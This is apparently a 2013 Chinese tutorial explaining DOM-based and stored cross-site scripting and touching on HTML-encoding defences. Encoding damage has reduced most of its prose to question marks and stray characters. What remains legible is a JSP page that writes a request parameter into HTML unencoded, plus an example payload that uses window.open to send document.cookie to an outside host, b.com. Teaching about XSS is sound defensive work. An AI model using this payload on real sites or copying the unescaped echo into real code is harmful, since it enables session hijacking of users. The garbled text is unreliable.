XSS??????????
???????????? ???????[ 2013/12/13 10:59:17 ] ????????
????XSS???CSS?????Cross SiteScript????????????????Web?????谐??????????XSS??????????????????????????????????????????危?????????????????????XSS??????????????(????)?????HTML???????????????????????????HTML??????????校?????????????????纾�??????Cookie??????????????????????????
????XSS????
????XSS??????????SQL???????????????????????????????XSS??????????XSS????????????????DOM Based XSS????????????Stored XSS???????????????锌??????????卸???????????写??????????????XSS??????????危??????????????????????????????????????script??
????DOM Based XSS
????DOM Based XSS???????????DOM??????????霉???????????械????????????
???????????
??????????a.com???????????????些?????????url?械??????content??????????????2???????娲�??????????????????????????
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>XSS????</title>
</head>
<body>
<%-- The "content" request parameter is written into the page as-is, with no HTML encoding --%>
????????<%=request.getParameter("content")%>
</body>
</html>
???????????Tom?????????????????????????????(????????????????????????)?????????????????????????????????http://www.a.com?content=<script>window.open(“www.b.com?param=”+document.cookie)</script>????Tom??????????????(????????????a.com)?????????????b.com???????Tom??a.com?械?cookie????????b.com??b.com???????????????????????????????????????Tom??a.com??cookie?????cookie????锌?????械???????????????????????校?????????Tom?????????????????????a.com?content=<script>alert(“xss”)</script>?????????????????????校???????????????????xss????????????????????????????喂????????????????
????Stored XSS
????Stored XSS??娲�?XSS??????????涔�??????????娲�???????????????????校?????????????????
????????????
????a.com????????锟�?????????a.com?蟹??????????锟�??????邪???????????<script>window.open(“www.b.com?param=”+document.cookie)</script>??????????????Tom??Jack????????????????锟�????????????????????????????cookie????????????????????????????????????????校?????????????
????Stored XSS???危???????危???????
????XSS????
???????????????矛????????校???矛?卸?????????????胁????????????????????????????????????蟹?????XSS?????????路????
???????????????
??????????????????????????????????????写?????????????????????????????????
????Html encode
?????????些????锟�??????????????????????????????????????????????????
??????
